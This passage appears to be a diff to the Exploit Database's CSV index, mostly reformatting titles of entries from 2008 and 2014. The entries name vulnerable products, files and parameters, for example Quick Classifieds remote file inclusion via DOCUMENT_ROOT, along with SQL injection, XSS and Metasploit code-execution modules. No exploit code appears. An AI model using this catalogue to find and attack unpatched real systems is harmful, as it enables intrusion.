Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0 +31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCms 7.0.3 - 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0 +31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor - 'id' Parameter SQL Injection Vulnerability",2008-03-24,RMx,php,webapps,0 +31477,platforms/multiple/dos/31477.txt,"snircd 1.3.4 And ircu 2.10.12.12 - 'set_user_mode' Remote Denial of Service Vulnerability",2008-03-24,"Chris Porter",multiple,dos,0 +31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling - Denial of Service Vulnerability",2008-03-24,sipherr,hardware,dos,0 +31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 - index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0 +31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 - locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 - search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 - classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 - classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 - controlcenter/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 - controlcenter/manager.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 - controlcenter/pass.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31487,platforms/php/webapps/31487.txt,"Quick Classifieds 1.0 - controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31488,platforms/php/webapps/31488.txt,"Quick Classifieds 1.0 - controlcenter/sign-up.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31489,platforms/php/webapps/31489.txt,"Quick Classifieds 1.0 - controlcenter/update.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 - controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 - controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 - controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 - controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 - controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 - controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 - controlpannel/alterTheme.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 - controlpannel/color_help.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 - controlpannel/createdb.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31499,platforms/php/webapps/31499.txt,"Quick Classifieds 1.0 - controlpannel/createFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 - controlpannel/createHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 - controlpannel/createL.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 - controlpannel/createM.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 - controlpannel/createNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 - controlpannel/createP.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 - controlpannel/createS.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 - controlpannel/createT.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31507,platforms/php/webapps/31507.txt,"Quick Classifieds 1.0 - controlpannel/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31508,platforms/php/webapps/31508.txt,"Quick Classifieds 1.0 - controlpannel/mailadmin.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31509,platforms/php/webapps/31509.txt,"Quick Classifieds 1.0 - controlpannel/setUp.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31510,platforms/php/webapps/31510.txt,"Quick Classifieds 1.0 - include/sendit.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31511,platforms/php/webapps/31511.txt,"Quick Classifieds 1.0 - include/sendit2.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php, zID param) - SQL Injection Vulnerability",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80 -31518,platforms/linux/remote/31518.rb,"Pandora FMS Remote Code Execution",2014-02-07,metasploit,linux,remote,8023 -31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface Code Execution",2014-02-07,metasploit,hardware,remote,0 +31518,platforms/linux/remote/31518.rb,"Pandora FMS - Remote Code Execution",2014-02-07,metasploit,linux,remote,8023 +31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution",2014-02-07,metasploit,hardware,remote,0 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection Vulnerability",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash PoC",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 -31524,platforms/windows/local/31524.rb,"Publish-It 3.6d (.pui) - SEH Buffer Overflow",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 +31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - (.pui) SEH Buffer Overflow",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 31525,platforms/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80 31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80 -31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter Remote File Include Vulnerability",2008-03-24,ZoRLu,php,webapps,0 -31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 -31530,platforms/php/webapps/31530.txt,"Joomla! and Mambo Download3000 Component 1.0 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 -31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 'haberoku.php' SQL Injection Vulnerability",2008-03-25,cOndemned,php,webapps,0 -31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 'postview.php' SQL Injection Vulnerability",2008-03-25,U238,php,webapps,0 -31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x eMBox Utility 'edirutil' Command Unspecified Vulnerability",2008-03-25,"Nicholas Gregorie",novell,remote,0 -31534,platforms/windows/remote/31534.html,"LEADTOOLS Multimedia 15 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 -31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 'irc.php' Local File Include Vulnerability",2008-03-25,0in,php,webapps,0 -31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 Request File Directory Traversal Vulnerability",2007-11-10,teeed,windows,remote,0 -31537,platforms/cgi/webapps/31537.txt,"Blackboard Academic Suite 6/7 webapps/blackboard/execute/viewCatalog searchText Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0 -31538,platforms/cgi/webapps/31538.txt,"Blackboard Academic Suite 6/7 bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0 -31539,platforms/php/webapps/31539.txt,"phpAddressBook 2.0 'index.php' SQL Injection Vulnerability",2008-03-26,"Virangar Security",php,webapps,0 -31540,platforms/linux/remote/31540.php,"PECL 3.0.x Alternative PHP Cache Extension 'apc_search_paths()' Buffer Overflow Vulnerability",2008-03-26,dannyp,linux,remote,0 -31541,platforms/php/webapps/31541.html,"Invision Power Board 2.x 'Signature' iFrame Security Vulnerability",2008-03-26,SHAHEE_MIRZA,php,webapps,0 -31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 Format String Vulnerability and Multiple Denial of Service Vulnerabilities",2008-03-26,"Luigi Auriemma",multiple,dos,0 -31543,platforms/php/webapps/31543.txt,"GeeCarts show.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0 -31544,platforms/php/webapps/31544.txt,"GeeCarts search.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0 -31545,platforms/php/webapps/31545.txt,"GeeCarts view.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0 -31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 lookup_result.asp domain Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 -31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 suggest_result.asp Multiple Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 -31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities",2008-03-27,XxX,php,webapps,0 -31550,platforms/bsd/dos/31550.c,"Multiple BSD Platforms 'strfmon()' Function Integer Overflow Weakness",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 -31551,platforms/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 Requests Containing MS-DOS Device Names Information Disclosure Vulnerability",2005-10-14,"security curmudgeon",multiple,remote,0 -31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 X.509sat Dissector Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 -31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 LDAP Dissector Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 -31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 SCCP Dissector Decode As Feature Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 -31555,platforms/php/webapps/31555.txt,"Simple Machines Forum <= 1.1.4 Multiple Remote File Include Vulnerabilities",2008-03-28,Sibertrwolf,php,webapps,0 -31556,platforms/php/webapps/31556.txt,"Cuteflow Bin 1.5 pages/showtemplates.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 -31557,platforms/php/webapps/31557.txt,"Cuteflow Bin 1.5 pages/editmailinglist_step1.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 -31558,platforms/php/webapps/31558.txt,"Cuteflow Bin 1.5 pages/showcirculation.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 -31559,platforms/php/webapps/31559.txt,"Cuteflow Bin 1.5 pages/edittemplate_step2.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 -31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 pages/showfields.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 -31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 pages/showuser.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 -31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP service Directory Traversal Vulnerability",2008-03-29,"Luigi Auriemma",windows,remote,0 -31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 Multiple Remote Denial Of Service and Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 -31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 'jax_linklists.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0 -31565,platforms/php/webapps/31565.txt,"@lex Guestbook <= 4.0.5 setup.php language_setup Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 -31566,platforms/php/webapps/31566.txt,"@lex Guestbook <= 4.0.5 index.php test Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 -31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 'setup.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0 -31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 +31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Include Vulnerability",2008-03-24,ZoRLu,php,webapps,0 +31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 - 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 +31530,platforms/php/webapps/31530.txt,"Joomla! and Mambo Download3000 Component 1.0 - 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 +31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection Vulnerability",2008-03-25,cOndemned,php,webapps,0 +31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 - 'postview.php' SQL Injection Vulnerability",2008-03-25,U238,php,webapps,0 +31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified Vulnerability",2008-03-25,"Nicholas Gregorie",novell,remote,0 +31534,platforms/windows/remote/31534.html,"LEADTOOLS Multimedia 15 - 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 +31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Include Vulnerability",2008-03-25,0in,php,webapps,0 +31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal Vulnerability",2007-11-10,teeed,windows,remote,0 +31537,platforms/cgi/webapps/31537.txt,"Blackboard Academic Suite 6/7 - webapps/blackboard/execute/viewCatalog searchText Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0 +31538,platforms/cgi/webapps/31538.txt,"Blackboard Academic Suite 6/7 - bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0 +31539,platforms/php/webapps/31539.txt,"phpAddressBook 2.0 - 'index.php' SQL Injection Vulnerability",2008-03-26,"Virangar Security",php,webapps,0 +31540,platforms/linux/remote/31540.php,"PECL 3.0.x - Alternative PHP Cache Extension 'apc_search_paths()' Buffer Overflow Vulnerability",2008-03-26,dannyp,linux,remote,0 +31541,platforms/php/webapps/31541.html,"Invision Power Board 2.x - 'Signature' iFrame Security Vulnerability",2008-03-26,SHAHEE_MIRZA,php,webapps,0 +31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String Vulnerability and Multiple Denial of Service Vulnerabilities",2008-03-26,"Luigi Auriemma",multiple,dos,0 +31543,platforms/php/webapps/31543.txt,"GeeCarts - show.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0 +31544,platforms/php/webapps/31544.txt,"GeeCarts - search.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0 +31545,platforms/php/webapps/31545.txt,"GeeCarts - view.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0 +31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - lookup_result.asp domain Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 +31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 +31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities",2008-03-27,XxX,php,webapps,0 +31550,platforms/bsd/dos/31550.c,"Multiple BSD Platforms - 'strfmon()' Function Integer Overflow Weakness",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 +31551,platforms/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 - Requests Containing MS-DOS Device Names Information Disclosure Vulnerability",2005-10-14,"security curmudgeon",multiple,remote,0 +31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 +31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 +31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 +31555,platforms/php/webapps/31555.txt,"Simple Machines Forum <= 1.1.4 - Multiple Remote File Include Vulnerabilities",2008-03-28,Sibertrwolf,php,webapps,0 +31556,platforms/php/webapps/31556.txt,"Cuteflow Bin 1.5 - pages/showtemplates.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31557,platforms/php/webapps/31557.txt,"Cuteflow Bin 1.5 - pages/editmailinglist_step1.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31558,platforms/php/webapps/31558.txt,"Cuteflow Bin 1.5 - pages/showcirculation.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31559,platforms/php/webapps/31559.txt,"Cuteflow Bin 1.5 - pages/edittemplate_step2.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 +31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal Vulnerability",2008-03-29,"Luigi Auriemma",windows,remote,0 +31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service and Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 +31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0 +31565,platforms/php/webapps/31565.txt,"@lex Guestbook <= 4.0.5 - setup.php language_setup Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 +31566,platforms/php/webapps/31566.txt,"@lex Guestbook <= 4.0.5 - index.php test Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 +31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0 +31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF Vulnerability",2014-02-11,killall-9,hardware,webapps,80 31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 31573,platforms/hardware/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,hardware,webapps,8880 31574,platforms/arm/local/31574.c,"Linux ARM - Local Root Exploit",2014-02-11,"Piotr Szerman",arm,local,0 -31575,platforms/windows/remote/31575.rb,"KingScada kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,metasploit,windows,remote,0 +31575,platforms/windows/remote/31575.rb,"KingScada kxClientDownload.ocx ActiveX - Remote Code Execution",2014-02-11,metasploit,windows,remote,0 31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0 -31577,platforms/unix/remote/31577.rb,"Kloxo SQL Injection and Remote Code Execution",2014-02-11,metasploit,unix,remote,7778 +31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection and Remote Code Execution",2014-02-11,metasploit,unix,remote,7778 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection Vulnerability",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal Vulnerability",2014-02-11,"Fara Rustein",windows,webapps,0 -31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 'jax_guestbook.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0 -31581,platforms/php/webapps/31581.txt,"PhpGKit 0.9 'connexion.php' Remote File Include Vulnerability",2008-03-31,ZoRLu,php,webapps,0 -31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 'catID' Parameter SQL Injection Vulnerability",2008-03-31,RMx,asp,webapps,0 -31583,platforms/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation Remote Information Disclosure Vulnerability",2008-03-31,"Alexander Klink",windows,remote,0 -31584,platforms/php/webapps/31584.txt,"Terracotta 'index.php' Local File Include Vulnerability",2008-04-01,"Joseph Giron",php,webapps,0 -31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/VISTA/2000/2003/2008 Kernel Usermode Callback Local Privilege Escalation Vulnerability (1)",2008-04-08,Whitecell,windows,dos,0 -31587,platforms/php/webapps/31587.txt,"EasySite 2.0 browser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 -31588,platforms/php/webapps/31588.txt,"EasySite 2.0 image_editor.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 -31589,platforms/php/webapps/31589.txt,"EasySite 2.0 skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 -31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0 -31591,platforms/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 PXE TFTP Service Directory Traversal Vulnerability",2008-04-02,"Luigi Auriemma",linux,remote,0 -31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 XDR Prototype Hijacking Denial of Service Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0 -31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 'ieframe.dll' Script Injection Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0 -31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0 -31595,platforms/php/webapps/31595.txt,"Joomla! and Mambo Joomlearn LMS Component 'cat' Parameter SQL Injection Vulnerability",2008-04-03,The-0utl4w,php,webapps,0 -31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 admin.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 -31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 index.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 -31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 sess.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 -31599,platforms/php/webapps/31599.txt,"mcGallery 1.1 stats.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 -31600,platforms/php/webapps/31600.txt,"mcGallery 1.1 detail.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 -31601,platforms/php/webapps/31601.txt,"mcGallery 1.1 resize.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 -31602,platforms/php/webapps/31602.txt,"mcGallery 1.1 show.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 -31603,platforms/php/webapps/31603.html,"Parallels Virtuozzo Containers 3.0.0-25.4/4.0.0-365.6 VZPP Interface File Manger Cross-Site Request Forgery Vulnerability",2008-04-03,poplix,php,webapps,0 -31604,platforms/php/webapps/31604.html,"Parallels Virtuozzo Containers 3.0.0-25.4.swsoft VZPP Interface Change Pass Cross-Site Request Forgery Vulnerability",2008-04-03,poplix,php,webapps,0 -31605,platforms/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,php,webapps,0 -31606,platforms/php/webapps/31606.txt,"Glossaire 2.0 'glossaire.php' Cross-Site Scripting Vulnerability",2008-04-04,ZoRLu,php,webapps,0 -31607,platforms/windows/dos/31607.py,"SmarterTools SmarterMail 5.0 HTTP Request Handling Denial Of Service Vulnerability",2008-04-04,ryujin,windows,dos,0 -31608,platforms/php/webapps/31608.txt,"KwsPHP 1.0 ConcoursPhoto Module 'VIEW' Parameter Cross-Site Scripting Vulnerability",2008-04-04,"H-T Team",php,webapps,0 -31609,platforms/php/webapps/31609.txt,"Nuke ET 3.4 'mensaje' Parameter HTML Injection Vulnerability",2008-04-04,"Jose Luis Zayas",php,webapps,0 -31610,platforms/php/webapps/31610.txt,"RobotStats 0.1 graph.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 -31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 robotstats.inc.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 -31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 'COUNT' Parameter Integer Overflow Vulnerability",2008-04-21,"Core Security Technologies",osx,remote,0 -31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 'shouts' Cross-Site Scripting Vulnerability",2008-04-04,Y433r,php,webapps,0 -31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat Denial-of-Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0 -31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 'langfile' Parameter Remote File Include Vulnerability",2008-04-04,ZoRLu,php,webapps,0 +31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting 